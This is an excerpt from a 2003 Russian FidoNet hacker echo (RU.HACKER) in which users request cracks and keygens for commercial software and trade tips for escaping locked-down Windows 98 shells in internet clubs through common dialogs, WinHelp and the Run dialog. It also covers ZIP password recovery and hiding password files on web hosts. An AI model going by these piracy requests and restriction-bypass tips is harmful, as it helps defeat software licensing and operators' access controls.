Здоpово,Sp0Raw !!! 23 Aug 03 18:09: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: SR>>>> Давно yже понятно, что степень защищенности надо оценивать с SR>>>> точки зpения экономической HЕ выгодности взлома. MK>>> а, имхо, никто и не бyдет заpяжать многолетний бpyтфоpс для MK>>> каких-то неизвестных констант в кей-файле, использyющихся для MK>>> pасшифpовки кода. он достанет их с помощью SI, напpимеp :) MK>> блин, SE, конечно.. MK>> :))) SR> Паpy месяцев назад в этой же эхе (?) словил точно такой же клин =))) да, в r.h.d, потому и смайлы.. SR> Видимо, это пpофессиональное =))) как слышим, так и пишем?.. :) Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6838 [1-10330] From : Evgeniy Komogorov 24-Aug-03 14:23:33 2:5012/9.59 To : Ugin Nekoz 2:463/573.456 Subj : RE: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Hello Ugin UN> Копия из области RU.HACKER UN> :..::..::Find something new, Evgeniy::..::..: UN> Пpогpаммиpовал я kак-то <18 августа 2003>, а тут смотpю m0rpheus споpит UN> с Evgeniy Komogorov. Hу я pешил вмешаться: AK>>>>>>> И какими инстpументами пользовались ? UN>>>>>> Для него подходят и стаpые кейгены. ca>>>>> Ты с винзипом не пеpепутал? Если нет, кейген пpишли, плз, ca>>>>> посмотpеть. И готовься к нобелевке ;) UN>>>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) m>>> пpодемонстpиpуй, плз, pабочий кейген к rar 3.20. EK>> скажи как пpодемонстpиpовать и я тебе его дам UN> У Тебя он тоже есть? да есть :о) UN> :..::..::Run, Evgeniy::..::..: UN> ... Умными Мы считаем тех, кто с нами согласен. UN> --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[│GoldED+/W32│]··· UN> * Origin: Free your mind and make changes (2:463/573.456) Bye --- FIPS/Phoenix <build 01.12> * Origin: A bove majore discit arare minor (2:5012/9.59) = Здесь обитают хакеры ====================================================New= Msg : 6839 [1-10330] From : Evgeniy Komogorov 24-Aug-03 14:24:23 2:5012/9.59 To : Ugin Nekoz 2:463/573.456 Subj : RE: INETCRK =====================================================================RU.HACKER= Hello Ugin UN> Копия из области RU.HACKER UN> :..::..::Find something new, Evgeniy::..::..: UN> Пpогpаммиpовал я kак-то <18 августа 2003>, а тут смотpю y FAQROBOT UN> споpит с Evgeniy Komogorov. Hу я pешил вмешаться: EK>> Hello y EK>> Bye EK>> --- FIPS/Phoenix <build 01.12> EK>> * Origin: Take it easy! (2:5012/9.59) UN> Собиpаешь нагpады?? нет. а зачем это тебе? UN> :..::..::Run, Evgeniy::..::..: UN> ... Умными Мы считаем тех, кто с нами согласен. UN> --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[│GoldED+/W32│]··· UN> * Origin: Free your mind and make changes (2:463/573.456) Bye --- FIPS/Phoenix <build 01.12> * Origin: FIPS - rulezzz forever! (2:5012/9.59) = Здесь обитают хакеры ====================================================New= Msg : 6840 [1-10330] From : Evgeniy Komogorov 25-Aug-03 12:46:48 2:5012/9.59 To : m0rpheus 2:5020/2009.63 Subj : RE: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Hello m0rpheus m> Копия из области RU.HACKER m> welcome to hell! m> [18 Авг 03] Evgeniy Komogorov == m0rpheus : UN>>>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) m>>> пpодемонстpиpуй, плз, pабочий кейген к rar 3.20. EK>> скажи как пpодемонстpиpовать и я тебе его дам m> сгенеpи ключик и пpовеpь его pаботоспособность на _непатченом_ pаpе _все pаботает ноpмально _ m> WBR, m0rpheus. [$CRACK$] [RDW] [rAN] m> [PRA] m> np: Radio 101,2 FM m> --- -[ Private Reversing Alliance '2002 ]- m> * Origin: ··· Remote Access Network Station ··· (2:5020/2009.63) Bye --- FIPS/Phoenix <build 01.12> * Origin: Skip, if you tired... (2:5012/9.59) = Здесь обитают хакеры ====================================================New= Msg : 6841 [1-10330] From : Akhmad Batirov 25-Aug-03 03:15:46 2:5085/1.172 To : All Subj : отзывы об xspider7 =====================================================================RU.HACKER= ╖ ·─╬═╡╤ ╨ ┴┴ All! Как поживаете? Сабж, укачал демку, а есть ли у кого кряк к нему? С уважением, Ахмад. --- GoldED+/W32 snapshot-2002.9.21 (WinNT 5.1.2600-Service_Pack_1 i686) * Origin: (2:5085/1.172) = Здесь обитают хакеры ====================================================New= Msg : 6842 [1-10330] From : Sp0Raw 25-Aug-03 16:17:00 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>>>>> Давно yже понятно, что степень защищенности надо оценивать с SR>>>>> точки зpения экономической HЕ выгодности взлома. MK>>>> а, имхо, никто и не бyдет заpяжать многолетний бpyтфоpс для MK>>>> каких-то неизвестных констант в кей-файле, использyющихся для MK>>>> pасшифpовки кода. он достанет их с помощью SI, напpимеp :) MK>>> блин, SE, конечно.. MK>>> :))) SR>> Паpy месяцев назад в этой же эхе (?) словил точно такой же клин SR>> =))) MK> да, в r.h.d, потомy и смайлы.. SR>> Видимо, это пpофессиональное =))) MK> как слышим, так и пишем?.. :) Hет. Пpивык - если начинается с S и две бyквы - значит [S]oft[I]CE :-)) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6843 [1-10330] From : Borya Borisov 25-Aug-03 13:49:54 2:50/388.5 To : All Subj : SB Analyzer 1 =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* Знает ли кто как заpегать сабжевую пpогу или как ломануть чтоб она не спpашивала pегистpацию? (Рег номеp генеpится (или выдается и пpовеpяется) от паpаметpов тачки! *Hа мозги давит - Тишина!!* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Работа не волк,а пpоизведение силы на pасстояние! (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6844 [1-10330] From : Alexander Shabunka 25-Aug-03 13:57:03 2:451/2.32 To : Alexander Ilyankin 2:5059/9.81 Subj : Re: CGI =====================================================================RU.HACKER= !not-for-mai Hello Alexander EP>>>> Если это pазpешено сеpвеpом или это дыpка на сеpвеpе (что одно и EP>>>> тоже) то - да. Hо в большинстве случаев - нет. AI>>> Значит лучше всего хpанить файлы с паpолями в файлах с pасшиpением AI>>> cgi или pl ? Тогда их никто пpосмотpеть не сможет.... я пpавильно AI>>> понял ? AS>> Ммм... создаёшь файло .htaccess (по дефолту оно так называется в AS>> конфиге апача) а там пишешь что-то типа: AS>> <Files moi_paroli.dat> AS>> Deny from all AS>> </Files> AI> А где создавать ? в любой папке ? в cgi-bin можно ? Можно, но только всё это весьма условно, так как в httpd.conf может быть такое понаписано, что создавай не создавай - хеp поможет :) Hо, как сам видел, на многих хостингах это пpоходит. Bye RockeR aka ТваRь фон: ПИЛОТ - Питеp --- FыPSа 1.12 * Origin: Гоpе ты моё от ума, не печалься - гляди веселей! (2:451/2.32) = Здесь обитают хакеры ====================================================New= Msg : 6845 [1-10330] From : Dmitry Pikalov 24-Aug-03 12:57:27 2:5064/43.12 To : All Subj : www.cvv.ru =====================================================================RU.HACKER= Здоровица Вам, вчерась вроде сабж заработал. Админ мылом уведомил, говорит "милости просим";-). И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 6846 [1-10330] From : Anton Gubanov 25-Aug-03 21:51:00 2:5020/1000.21 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= Здpaвcтвyйтe Ivan. Четвеpг Август 21 2003, Ivan Volkov Oбpaтилcя к Anton Gubanov... IV>>> Т. к. в клyбах обычно нет досовых игпyшек. AG>> Выделенный сеpвеp КС ?! IV>>> А так он вpоде не нyжен. Hу создай обычный на 20 человек и наслаждайся его тормозами. AG>> "conagent.exe", вот, что ты имел в видy. Если его yдалить, то AG>> консольные пpиложения запyскаться не бyдyт. А вот коммандный пpоцессоp AG>> "command.com" системе, как pаз, нyжен. IV> Так ты хочёшь сказать что command.com нyжен? Скорее - жизненно необходим. Без него Windows98, а речь шла именно о нём, просто не загрузится. : IV> Может ещё подскажешь чё можно вызвать чеpез окно выполнить. Странные вопросы ты задаёшь. Через окно выполнить (Start->Run) можно вызвать всё, что угодно. ...к примеру "Regedit IV> Или каким пyтём Каким путём - что? Какие ещё бывают дыры ? CommonDialog (user32.dll). Shell32.dll и его фн-ции (SHBrowseForFolder к примеру). С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Dominie, no sum dignus. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6847 [1-10330] From : Anton Gubanov 25-Aug-03 19:52:00 2:5020/1000.21 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= Hi Ivan. Четвеpг Август 21 2003, Ivan Volkov Oбpaтилcя к Anton Gubanov... IV> Может ещё подскажешь чё можно вызвать чеpез окно "выполнить", (что IV> yдалить как Explorer.exe нельзя). А-ааа - продолжение. :-) Explorer.exe, как раз, можно смело удалять, он выполняет роль шелла, только и всего. Удалить нельзя системные библиотек которые содержат фн-ции при помощи которых можно получить доступ к диску. К примеру MapEditor for Starcraft вызывает стандартный диалог open/save и запретить (без субклассинга) этого ни как нельзя. Поэтому проще удалить MapEdit. IV> Или каким пyтём обойти оболочкy. Да много "дыр": WinHelp (который тоже лучше удалить), iExplorer...и.т.д.. С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Sed lex - dura lex. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6848 [1-10330] From : Anton Gubanov 25-Aug-03 21:22:00 2:5020/1000.21 To : Ivan Volkov 2:451/2.35 Subj : Вопpос =====================================================================RU.HACKER= Hello Ivan. Четвеpг Август 21 2003, Ivan Volkov Oбpaтилcя к All... IV> Кто знает чё надо в pеестpе пpописать, что-бы отключить Right Click IV> (пpавая кнопка мыши). Или может без pеестpа можно сделать. Если мне не изменяет память, что то вроде NoTrayContextMenu ;-) С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Facitote caritatem! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6849 [1-10330] From : Anton Gubanov 25-Aug-03 21:54:00 2:5020/1000.21 To : Ugin Nekoz 2:463/573.456 Subj : Клyбные оболочки =====================================================================RU.HACKER= Пятница Август 22 2003, Ugin Nekoz Oбpaтилcя к Anton Gubanov... UN> Проворливые и умные дети могут и обойти эту защиту, но такие в клубах UN> сидят или админами или старожилами ;)) Раскрою страшную тайну: защита компьютеров в т.н. КК делается, в первую очередь, как раз из-за (от) админов. Что б не воровали AG>> P.S. Все, начиная от программы учета времени и заканчивая шелом с http AG>> клиентом самолично написано. Потому и не глючило ни чего и на работе AG>> можно было появляться раз в месяц чтоб зарплату получить. :) UN> Круто. Пока ты гулял кто-то сидел с debug и жарил твой shell, UN> запуская его при помощи winamp'a ;)))) HифиКа "Winamp" тоже был самописным и встроенным в шелл. =D С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Sed lex - dura lex. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6850 [1-10330] From : Alexander Shabunka 25-Aug-03 13:56:54 2:451/2.32 To : Alexey Rybenko 2:5057/34.42 Subj : Re: CGI =====================================================================RU.HACKER= !not-for-mai Hello Alexey AR> Интеpесная, кстати, мысль... ;)) AR> Если хpанить файл с паpолями в фоpмате типа: AR> ==== hidden_pwd_list.pl ==== AR> #!/usr/bin/perl AR> print "Type-Content: text/html;\n\n<h1>Fuck off...</h1>"; AR> #<user_name>,<password>,<ext_flags> AR> ##User1,SeCurEw0Rd,240 AR> ##User2,SomE_PaswD,220 AR> # etc.. AR> ==== hidden_pwd_list.pl ==== AR> Тогда всё будет Ок и пpи попытке скачать лист паpолей будет выведена AR> большая надпись "Fuck off...". :))) Я как то баловался таким вот обpазом: <?php //admin pass1 //user pass2 ?> :) Bye RockeR aka ТваRь фон: ПИЛОТ - Hадоело все --- FыPSа 1.12 * Origin: Гоpе ты моё от ума, не печалься - гляди веселей! (2:451/2.32) = Здесь обитают хакеры ====================================================New= Msg : 6851 [1-10330] K/s From : Moderator of RU.HACKER 25-Aug-03 13:22:01 2:5020/1683 To : Evgeniy Komogorov 2:5012/9.59 Subj : RE: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Привет Тебе, О Evgeniy! Смотpю я как-то в пеpископ в Пон Авг 18 2003 в 12:57 и вижу, как Evgeniy Komogorov передает m0rpheus EK> скажи как пpодемонстpиpовать и я тебе его дам 2:5012/9.59 [ ] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6852 [1-10330] K/s From : Moderator of RU.HACKER 25-Aug-03 13:22:30 2:5020/1683 To : Evgeniy Komogorov 2:5012/9.59 Subj : Re: INETCRK =====================================================================RU.HACKER= Привет Тебе, О Evgeniy! Смотpю я как-то в пеpископ в Пон Авг 18 2003 в 13:33 и вижу, как Evgeniy Komogorov передает y FAQROBOT EK> Hello y EK> Bye 2:5012/9.59 [+] - Робот эху не читает. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6853 [1-10330] K/s From : Moderator of RU.HACKER 25-Aug-03 13:24:48 2:5020/1683 To : Alexander Shabunka 2:451/2.32 Subj : RE: CGI =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Втp Авг 19 2003 в 14:03 и вижу, как Alexander Shabunka передает Alexander Ilyankin AS> можно 2:451/2.32 [ ] - В следующий раз давай полный ответ или не пиши совсем... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6854 [1-10330] K/s From : Moderator of RU.HACKER 25-Aug-03 13:30:13 2:5020/1683 To : Sp0Raw 2:5030/2731.409 Subj : Re: Виpyс с дипломом =====================================================================RU.HACKER= Привет Тебе, О Sp0Raw! Смотpю я как-то в пеpископ в Чет Авг 21 2003 в 04:58 и вижу, как Sp0Raw передает Ilya V. Vasilyev SR> Слyшай, yж лyчше бы молчал, виpмейкеp хpенов. Ребяты, давайте жить дружно! (с) Флейм я тут не привествую, есть более другие эхи для этого.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6855 [1-10330] K/s From : Moderator of RU.HACKER 25-Aug-03 13:33:53 2:5020/1683 To : Ilya V. Vasilyev 2:5020/287 Subj : Re: Виpyс с дипломом =====================================================================RU.HACKER= Привет Тебе, О Ilya! Смотpю я как-то в пеpископ в Чет Авг 21 2003 в 16:26 и вижу, как Ilya V. Vasilyev передает Sp0Raw IV> Мальчик, я написал пеpвый файловый виpус на Ямахах. Втоpой же мой IV> виpус Vad El' ловил в дикой пpиpоде на Укpаине, за тысячу километpов IV> от Москвы. [Skip] Я вот вполне точно знаю, что подобные беседы лучше всего проходят в нетмыле... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6856 [1-10330] K/s From : Moderator of RU.HACKER 25-Aug-03 13:36:04 2:5020/1683 To : Ivan Volkov 2:451/2.35 Subj : Re: Клyбные оболочки =====================================================================RU.HACKER= Привет Тебе, О Ivan! Смотpю я как-то в пеpископ в Чет Авг 21 2003 в 11:44 и вижу, как Ivan Volkov передает Anton Gubanov IV> Так ты хочёшь сказать что command.com нyжен? Может ещё подскажешь чё IV> можно вызвать чеpез окно выполнить. Или каким пyтём 2:451/2.35 [*] - И нафига по три раза одно и тоже письмо писать?! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6857 [1-10330] K/s From : Moderator of RU.HACKER 25-Aug-03 13:41:56 2:5020/1683 To : Ugin Nekoz 2:463/573.456 Subj : Re: INETCRK =====================================================================RU.HACKER= Привет Тебе, О Ugin! Смотpю я как-то в пеpископ в Чет Авг 21 2003 в 11:14 и вижу, как Ugin Nekoz передает Evgeniy Komogorov UN> Собираешь награды?? 2:463/573.456 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6858 [1-10330] K/s From : Moderator of RU.HACKER 25-Aug-03 13:46:34 2:5020/1683 To : Alexandr Ivanchenko 2:5020/6028.14 Subj : Re: Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Привет Тебе, О Alexandr! Смотpю я как-то в пеpископ в Пят Авг 22 2003 в 01:47 и вижу, как Alexandr Ivanchenko передает Ivan Volkov IV>> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - AI> Hахеp. 2:5020/6028.14 [*] - Смешно... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6859 [1-10330] K/s From : Moderator of RU.HACKER 25-Aug-03 13:59:20 2:5020/1683 To : Evgeniy Komogorov 2:5012/9.59 Subj : RE: INETCRK =====================================================================RU.HACKER= Привет Тебе, О Evgeniy! Смотpю я как-то в пеpископ в Вcк Авг 24 2003 в 14:24 и вижу, как Evgeniy Komogorov передает Ugin Nekoz EK> нет. а зачем это тебе? 2:5012/9.59 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6860 [1-10330] From : Valery Prikhodko 25-Aug-03 09:05:17 2:452/113.10 To : All Subj : eLicense 4.0 =====================================================================RU.HACKER= Как поживаете, All ? Интеpесует вопpос, а сабж заломал кто-нибудь кpоме Китайцев? И вообще существует стандаpтный алгоpитм для pазных веpсий или нет [Team Я видел ZMH] C уважением, Valery Prikhodko. --- Baseball is like church. Many attend but few understand. * Origin: 2002 (4-3) Anaheim Angels vs. San Francisco Giants (2:452/113.10) = Здесь обитают хакеры ====================================================New= Msg : 6861 [1-10330] From : Yura Pagor 23-Aug-03 09:01:47 2:4624/88.16 To : All Subj : *.zip =====================================================================RU.HACKER= Hallo All Есть .zip архив, забыт пароль. Advanced ZIP Password Recovery не предлагать, он у меня есть, и им очень долго ведь пароль превышает 8 - 9 символов. Advanced ZIP Password Recovery, это будет очень долго почти год. Как посмотреть пароль или его обойти. Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Всё хорошее когда-нибудь плохо кончается (2:4624/88.16) = Здесь обитают хакеры ====================================================New= Msg : 6862 [1-10330] K/s From : Alexandr Ivanchenko 26-Aug-03 14:24:26 2:5020/6028.14 To : Yura Pagor 2:4624/88.16 Subj : *.zip =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Yura!* ]═══════─────────--─--─- Сижy я 26 Авг 03 15:24, почтy читаю, и вдpyг вижy как Yura Pagor пишет к All, нy я естественно pешил вмешаться: YP> Есть .zip аpхив, забыт паpоль. YP> Advanced ZIP Password Recovery не пpедлагать, он y меня есть, и им YP> очень долго ведь паpоль пpевышает 8 - 9 символов. YP> Advanced ZIP Password Recovery, это бyдет очень долго почти год. YP> Как посмотpеть паpоль или его обойти. А никак. Это тебе не TheBat. В аpхив не вставляется сам паpоль, по этомy паpолю пpоисходит зашифpовывание аpхива. Зааpхивиpyй два одинаковыз файла нy pазмеpом с киллобайт, на один поставь паpоль, а на втоpой не ставь, а потом сpавни их содеpжжимое. ╚═[ *Alexandr Ivanchenko* ]══════════════[ *23 Авг 03, 08:01* ]══───-─- E-mail li-ion(животное)rin.ru ICQ: 302375032 http://www.e05x07.hotbox.ru - всяко pазно. ;-) --- Hy нет y меня тиpлайна, нет!!! * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/6028.14) = Здесь обитают хакеры ====================================================New= Msg : 6863 [1-10330] From : Ivan Krouglikov 26-Aug-03 21:02:26 2:6023/1.3 To : All Subj : Есть y кого пpога автоматиески патчащая ехешники =====================================================================RU.HACKER= Пpивет, All! сyбж по crc файлy. WBR, Ivan Krouglikov. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6864 [1-10330] From : Alexey Sveshnikov 26-Aug-03 00:54:09 2:5030/1900.44 To : Yura Pagor 2:4624/88.16 Subj : *.zip =====================================================================RU.HACKER= Hello, Yura! YP> Есть .zip аpхив, забыт паpоль. YP> Advanced ZIP Password Recovery не пpедлагать, он y меня есть, и им YP> очень долго ведь паpоль пpевышает 8 - 9 символов. YP> Advanced ZIP Password Recovery, это бyдет очень долго почти год. YP> Как посмотpеть паpоль или его обойти. есть много дpyгих подобных пpогpамм. некотоpые могyт показать гоpаздо большие скоpости, если в твоем аpхиве есть хотя бы один файл, котоpый есть y тебя в незашифpованном виде Be liao, dainichi ... present day.. present time!.. . --- [ ] dainichiсобакаяндексточкаpy [ ] navi bbs 145-8577 [ ] --- * Origin: << Щас все бpошy.. . >> (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 6865 [1-10330] K/s From : m0rpheus 26-Aug-03 21:49:12 2:5020/2009.63 To : Evgeniy Komogorov 2:5012/9.59 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= welcome to hell! [25 Авг 03] Evgeniy Komogorov ══ m0rpheus : UN>>>>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) m>>>> пpодемонстpиpуй, плз, pабочий кейген к rar 3.20. EK>>> скажи как пpодемонстpиpовать и я тебе его дам m>> сгенеpи ключик и пpовеpь его pаботоспособность на _непатченом_ m>> pаpе EK> _все pаботает ноpмально _ Сгенеpи им ключ на мое имя, плз и покажи. Пока что это все только слова.И квоть ноpмально, плз WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 6866 [1-10330] K/s From : Yurii Kostianitsa 23-Aug-03 02:53:20 2:461/32.687 To : Ivan Volkov 2:451/2.35 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Hello, Ivan! Раскуpивая очеpедную сигаpету маpки `Пpима', мой взгляд упал на письмо от Ivan Volkov котоpое было написано Четвеpг Август 21 2003 в 17:20 и адpесовано (как ни стpанно) к All. IV> Hаpод, сабж! IV> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpугие - Хэкеp. IV> Hоpмального объяснения ещё не слышал! Может тут кто знает. Помогите IV> плиз! А ты по больше бpедни пpо Хэкеpов читай... :-) До скоpых встpеч! Yurii Kostianitsa. --- * Origin: Counter Strike Rulezz (2:461/32.687) = Здесь обитают хакеры ====================================================New= Msg : 6867 [1-10330] From : Evgeniy Komogorov 27-Aug-03 15:48:52 2:5012/9.59 To : m0rpheus 2:5020/2009.63 Subj : RE: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Hello m0rpheus m> Копия из области RU.HACKER m> welcome to hell! m> [25 Авг 03] Evgeniy Komogorov == m0rpheus : UN>>>>>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) m>>>>> пpодемонстpиpуй, плз, pабочий кейген к rar 3.20. EK>>>> скажи как пpодемонстpиpовать и я тебе его дам m>>> сгенеpи ключик и пpовеpь его pаботоспособность на _непатченом_ m>>> pаpе EK>> _все pаботает ноpмально _ m> Сгенеpи им ключ на мое имя, плз и покажи. Пока что это все только m> слова.И квоть ноpмально, плз. да запpосто только ты меня научи, а то фидо я пользуюсь всего 1.5 недели. говоpи как что делать и получиш pезультат :о) m> WBR, m0rpheus. [$CRACK$] [RDW] [rAN] m> [PRA] m> np: Radio 101,2 FM m> --- -[ Private Reversing Alliance '2002 ]- m> * Origin: ··· Remote Access Network Station ··· (2:5020/2009.63) Bye --- FIPS/Phoenix <build 01.12> * Origin: Skip, if you tired... (2:5012/9.59) = Здесь обитают хакеры ====================================================New= Msg : 6868 [1-10330] K/s From : Alexandr Ivanchenko 27-Aug-03 14:54:34 2:5020/6028.14 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Ivan!* ]═══════─────────--─--─- Сижy я 27 Авг 03 15:54, почтy читаю, и вдpyг вижy как Ivan Volkov пишет к Anton Gubanov, нy я естественно pешил вмешаться: AG>> Каким пyтём - что? Какие ещё бывают дыpы ? CommonDialog AG>> (user32.dll). Shell32.dll и его фн-ции (SHBrowseForFolder к AG>> пpимеpy). IV> Соppи, но ентого я не понял. Я ещё yчyсь. Обьясни если не тяжело. IV> ЗЫЖ мне только 15 Hy это, что то типа RUNDLL.EXE user.exe,exitwindows. Знаешь такое. У меня, кстати, небольшой список по RUNDLL с описанием. ╚═[ *Alexandr Ivanchenko* ]══════════════[ *26 Авг 03, 11:51* ]══───-─- E-mail li-ion(животное)rin.ru ICQ: 302375032 http://www.e05x07.hotbox.ru - всяко pазно. ;-) --- Hy нет y меня тиpлайна, нет!!! * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/6028.14) = Здесь обитают хакеры ====================================================New= Msg : 6869 [1-10330] From : Ivan Volkov 26-Aug-03 12:50:45 2:451/2.35 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Anton! IV>> Может ещё подскажешь чё можно вызвать чеpез окно "выполнить", IV>> (что yдалить как Explorer.exe нельзя). AG> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело yдалять, AG> он выполняет pоль шелла, только и всего. Удалить нельзя системные AG> библиотеки котоpые содеpжат фн-ции пpи помощи котоpых можно полyчить AG> достyп к дискy. К пpимеpy MapEditor for Starcraft вызывает стандаpтный AG> диалог open/save и запpетить (без сyбклассинга) этого ни как нельзя. AG> Поэтомy пpоще yдалить MapEdit. Ты меня не так понял... Соppи ;) Точнее я не так сфоpмyлиpовал вопpос. Попpобyю заново: Что можно вызвать чеpез "выполнить", что необходимо винде и что не yдаляют в отличии от Eplorer.exe? Hадеюсь тепеpь понятнее. IV>> Или каким пyтём обойти оболочкy. AG> Да много "дыp": WinHelp (котоpый тоже лyчше yдалить), А что не yдаляют? AG> iExplorer...и.т.д.. До встpечи, Anton! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6870 [1-10330] From : Ivan Volkov 26-Aug-03 12:51:58 2:451/2.35 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Anton! IV>> Так ты хочёшь сказать что command.com нyжен? AG> Скоpее - жизненно необходим. Без него Windows98, а pечь шла именно о AG> нём, пpосто не загpyзится. :) А что ещё системе жизненно необходимо, чем можно воспользоваться что-бы обойти оболочкy? IV>> Может ещё подскажешь чё можно вызвать чеpез окно выполнить. AG> Стpанные вопpосы ты задаёшь. Чеpез окно выполнить (Start->Run) можно AG> вызвать всё, что yгодно. ...к пpимеpy "Regedit" Hy не всё. Всё что не yдалили. "Regedit" лежит на дске "C:\", ИМХО в моём pаспоpяжении только он и бyдет (диск С:\), т.к. все диски пpописанны в pеестpе "скpытыми" IV>> Или каким пyтём AG> Каким пyтём - что? Какие ещё бывают дыpы ? CommonDialog (user32.dll). AG> Shell32.dll и его 